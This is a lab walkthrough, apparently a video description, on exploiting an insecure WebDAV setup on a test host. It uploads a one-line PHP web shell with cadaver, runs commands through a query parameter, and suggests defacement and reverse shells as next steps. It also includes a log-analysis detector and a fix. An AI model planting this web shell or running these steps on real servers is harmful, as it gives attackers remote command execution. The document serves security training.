Insecure WebDAV Configuration - Low Security Level
Solution:
Step 1. On the lesson page, click on WebDAV; a new window will pop up.
http://10.0.2.4/webdav/ is the address of the WebDAV folder. We are going to use a tool called 'cadaver' to query WebDAV and upload a file to the remote server.
Step 2. Open a command prompt and type cadaver
Type help to display all the commands
Enter the commands below
open http://10.0.2.4/webdav/
ls
put
Step 3. Open a new command prompt and create a simple PHP shell.
Command - nano pseudotime.php
Note: As angle brackets aren't allowed in a YouTube description, they are replaced with ( ) here; kindly make the necessary change.
(?php
echo system($_GET['cmd']);
?)
Save the file
put pseudotime.php pseudotime.php // Follow steps as shown in the video
Step 4. In the browser, go to the URL
http://10.0.2.4/webdav/pseudotime.php?cmd=id
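Seen from the server side, the steps above leave a recognisable trail in the access log: a successful PUT of a .php file into /webdav/, followed by a request that runs it. The Python sketch below is an added example, not part of the original walkthrough; it assumes Apache common/combined log format, and the log lines, the client addresses and the extension list are constructed for illustration.

```python
import re
from urllib.parse import urlsplit

# Apache common/combined prefix: host ident user [time] "METHOD target PROTO" status size
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)
# Extensions a PHP-enabled server may execute (assumed list; match it to the handler config)
SCRIPT_EXT = (".php", ".phtml", ".php5", ".phar")

# Constructed sample log lines mirroring the walkthrough (not real traffic)
SAMPLE_LOG = [
    '10.0.2.15 - - [12/Mar/2024:10:01:02 +0000] "PROPFIND /webdav/ HTTP/1.1" 207 1203',
    '10.0.2.15 - - [12/Mar/2024:10:01:40 +0000] "PUT /webdav/pseudotime.php HTTP/1.1" 201 275',
    '10.0.2.15 - - [12/Mar/2024:10:02:05 +0000] "GET /webdav/pseudotime.php?cmd=id HTTP/1.1" 200 54',
    '10.0.2.20 - - [12/Mar/2024:10:03:00 +0000] "PUT /webdav/notes.txt HTTP/1.1" 201 270',
    '10.0.2.20 - - [12/Mar/2024:10:03:10 +0000] "GET /index.php HTTP/1.1" 200 5120',
]

def find_webdav_script_abuse(lines):
    """Flag scripts written with PUT and any later successful request for them."""
    uploaded = set()   # paths of scripts created through a 2xx PUT
    findings = []      # (kind, client, path, query string)
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue   # skip lines that are not in the expected format
        parts = urlsplit(m["target"])
        path = parts.path.lower()
        ok = m["status"].startswith("2")
        if m["method"] == "PUT" and ok and path.endswith(SCRIPT_EXT):
            uploaded.add(path)
            findings.append(("script-upload", m["host"], path, ""))
        elif m["method"] in ("GET", "POST") and ok and path in uploaded:
            findings.append(("uploaded-script-run", m["host"], path, parts.query))
    return findings

if __name__ == "__main__":
    for finding in find_webdav_script_abuse(SAMPLE_LOG):
        print(finding)
```

The misconfiguration itself is closed by requiring authentication for WebDAV write methods and by not letting the server execute scripts from the upload directory.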
Note: Not covered in this video but you can explore this lesson further with -
i. Upload an image to deface the website
ii. Get a reverse shell generated.
PseudoTime